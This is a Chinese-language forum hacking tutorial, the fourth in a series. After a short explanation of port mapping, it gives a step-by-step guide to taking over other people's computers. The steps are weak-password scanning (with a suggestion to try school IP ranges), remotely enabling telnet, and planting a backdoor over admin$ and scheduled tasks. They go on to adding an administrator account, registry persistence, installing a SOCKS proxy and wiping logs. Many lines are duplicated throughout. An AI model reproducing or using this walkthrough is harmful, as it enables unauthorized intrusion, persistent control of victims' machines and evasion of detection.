[第4天]從簡單的網絡命令講起
昨天的帖子發表後,很多朋友問了很多問題,我發現很多朋友對基本的網絡命令還很生疏,請你看這個帖子,裏面講的很詳細的[url]http://www.91one.net/dvbbs/dispbbs.asp?boardID=14&ID=403[/url]
有個朋友問了我個問題:端口映射是什麼意思??
其實很簡單的,採用端口映射(Port Mapping)的方法,可以實現從Internet到局域網內部機器的特定端口服務的訪問。例如,你所使用的機子處於一個連接到Internet的局域網內,你在機子上所開的所有服務(如FTP),默認情況下外
界是訪問不了的。這是因爲你機子的IP是局域網內部IP,而外界能訪問的只有你所連接的服務器的IP,由於整個局域網在Internet上只有一個真正的IP地址,而這個IP地址是屬於局域網中服務器獨有的。所以,外部的Internet登錄時只
可以找到局域網中的服務器,那你提供的服務當然是不起作用的。
所以解決這個問題的方法就是採用PM了。
有篇文章不錯。大家看看:[url]http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10301/127157.html[/url]
所以解決這個問題的方法就是採用PM了。
有篇文章不錯。大家看看:[url]http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10301/127157.html[/url]
繼續講,昨天有人說我找到個肉雞,但不會用遠程控制軟件。先說用什麼好呢
我推薦Remote Administrator,有篇介紹它的文章很好:[url]http://www.pcworld.com.cn/2002/back_issues/2205/0533e.asp[/url]
下載:[url]http://www.skycn.com/soft/15592.html[/url]
我想裏面的說明你應該能很好理解的
現在我以一個例子來說一下怎麼獲得一個肉雞,雖然前面一直在說,但好象有點亂的,下面說的這個有點投機取巧的感覺,至少我這樣覺得,不過因爲很多朋友說都5天了,我什麼都沒搞到啊,所以只能。。
第一步:掃描弱口令
這裏我用20cn開發的scanipc (這[url]http://down.yqdown.com/xdown/yqdown0316/scanipc.rar[/url]有下的)
不一會就會掃到很多有弱口令的主機
(你可以拿你們學校的IP試試)
這裏我用20cn開發的scanipc (這[url]http://down.yqdown.com/xdown/yqdown0316/scanipc.rar[/url]有下的)
不一會就會掃到很多有弱口令的主機
(你可以拿你們學校的IP試試)
這裏我用opentelnet(遠程啓動TELNET的小東西,這裏下:[url]http://www.infosw.com/down/software.asp?id=1520[/url])給掃描到開了空口令的主機開個端口讓我們telnet連接上去
,開了23端口,並可以連接上的主機就不用進行次步驟了!
Opentelnet使用方法:
OpenTelnet.exe \\server <帳號> <密碼> <NTLM認證方式> <Telnet端口>
列如:
C:\>OpenTelnet.exe \\192.168.1.2 administrator 123456 1 90 用戶名:administrator 密碼:123456
NTLM認證方式:1(也可以選擇0請自己測試) 開的端口:90
運行完,如果屏幕上出現 Disconnecting server...Successfully! 就說明已經成功。
這樣,我們就能夠得到一個開90端口的Telnet服務器了。
,開了23端口,並可以連接上的主機就不用進行次步驟了!
Opentelnet使用方法:
OpenTelnet.exe \\server <帳號> <密碼> <NTLM認證方式> <Telnet端口>
列如:
C:\>OpenTelnet.exe \\192.168.1.2 administrator 123456 1 90 用戶名:administrator 密碼:123456
NTLM認證方式:1(也可以選擇0請自己測試) 開的端口:90
運行完,如果屏幕上出現 Disconnecting server...Successfully! 就說明已經成功。
這樣,我們就能夠得到一個開90端口的Telnet服務器了。
Telnet 192.168.1.2 90
這樣就可以登錄上去了。
這樣就可以登錄上去了。
第三步:配置並安裝後門程序
這裏我選擇WinShell(小巧精幹我喜歡下載:[url]http://www.hktk.com/soft/soft_server/winshell.html[/url]),用winshell主程序設置好後門,然後把後門程序傳到臺FTP空間上!
列如:
c:\>ftp
ftp>openwww.cnwill.com
然後輸入用戶名字 密碼把後門傳上去mput c:\cnwill.exe
現在我們登陸到肉雞上 Telnet 192.168.1.2 90
把剛上傳的後門程序下載並運行(別忘記刪除 後門程序)
『後門也可以用net命令完成』
這裏我選擇WinShell(小巧精幹我喜歡下載:[url]http://www.hktk.com/soft/soft_server/winshell.html[/url]),用winshell主程序設置好後門,然後把後門程序傳到臺FTP空間上!
列如:
c:\>ftp
ftp>openwww.cnwill.com
然後輸入用戶名字 密碼把後門傳上去mput c:\cnwill.exe
現在我們登陸到肉雞上 Telnet 192.168.1.2 90
把剛上傳的後門程序下載並運行(別忘記刪除 後門程序)
『後門也可以用net命令完成』
copy d:\zilong.exe \\192.168.1.2 90\admin$\system32
[ 上 傳 一 個 後 門 程 序 到 對 方 的 主 機 裏]
[ 上 傳 一 個 後 門 程 序 到 對 方 的 主 機 裏]
copy d:\long.exe \\192.168.1.2 90\admin$\system32
[上 傳 一 個 刪 除 日 志 程 序 到 對 方 的 主 機 裏]
[上 傳 一 個 刪 除 日 志 程 序 到 對 方 的 主 機 裏]
copy d:\scoks.exe \\192.168.1.2 90\admin$\system32
[ 上 傳 一 個 SCOKS 代 理 程 序 到 對 方 的 主 機 裏]
[ 上 傳 一 個 SCOKS 代 理 程 序 到 對 方 的 主 機 裏]
copy d:\zilong.reg \\192.168.1.2 90\admin$\system32
[上 傳 導 入 注 冊 表的 REG 文 件 到 對 方 的 主 機 裏]請看後門說明
[上 傳 導 入 注 冊 表的 REG 文 件 到 對 方 的 主 機 裏]請看後門說明
net time \\192.168.1.2 90
[ 得 到 對 方 主 機 的 當 前 時 間]
[ 得 到 對 方 主 機 的 當 前 時 間]
at \\192.168.1.2 90 13:20 zilong.exe
[用 a t命 令 執 行 我 們 的 後 門 程 序] 別 把 時 間 搞 錯 了 哦
[用 a t命 令 執 行 我 們 的 後 門 程 序] 別 把 時 間 搞 錯 了 哦
==============
如果大家用不習慣命令的話,那就用流光的IPC種植者吧,簡單易用.這裏就不贅述啦
=============
如果大家用不習慣命令的話,那就用流光的IPC種植者吧,簡單易用.這裏就不贅述啦
=============
telnet 192.168.1.2 90
[ 從 我 們 設 置 的 後 門 程 序 登 陸 主 機 ]
[ 從 我 們 設 置 的 後 門 程 序 登 陸 主 機 ]
net user **** /add
[近來後添加一個用戶名再說或者也可以選擇激活guest]
[近來後添加一個用戶名再說或者也可以選擇激活guest]
net localgroup administrators **** /add
[ 把 自 己 添 加 到 管 理 組 裏,這 樣 我 們 就 是 超 級 管 理 員 了]
[ 把 自 己 添 加 到 管 理 組 裏,這 樣 我 們 就 是 超 級 管 理 員 了]
regedit /s c:\winnt\system32\zilong.reg
[ 把 後 門 程 序 導 入 注 冊 表 的 啓 動 項]這樣做是防止被別人停止我們
的後門服務程序,就算我們的後門服務程序被停止了,在主機重啓動後我們的後門
服務就又繼續運行了.
[ 把 後 門 程 序 導 入 注 冊 表 的 啓 動 項]這樣做是防止被別人停止我們
的後門服務程序,就算我們的後門服務程序被停止了,在主機重啓動後我們的後門
服務就又繼續運行了.
SOCKS -install
[ 開 始 安 裝 socks 代 理]
[ 開 始 安 裝 socks 代 理]
SCOKS -config starttype 2
[ 使 SOCKS 代 理 程 序 自 動 運 行,不 怕 肉 雞 再 重 啓 了]
[ 使 SOCKS 代 理 程 序 自 動 運 行,不 怕 肉 雞 再 重 啓 了]
socks -config port 1080
[ socks 代 理 端 口 設 置 爲 1080 ]
[ socks 代 理 端 口 設 置 爲 1080 ]
net start skserver
[ 啓 動 SOCKS 代 理 服 務 ]可以打開QQ設置IP代理了
[ 啓 動 SOCKS 代 理 服 務 ]可以打開QQ設置IP代理了
long
[ 剛 才 上 傳 的 一 個 刪 除 日 志 程 序,運 行 它 就 可 以 了]
[ 剛 才 上 傳 的 一 個 刪 除 日 志 程 序,運 行 它 就 可 以 了]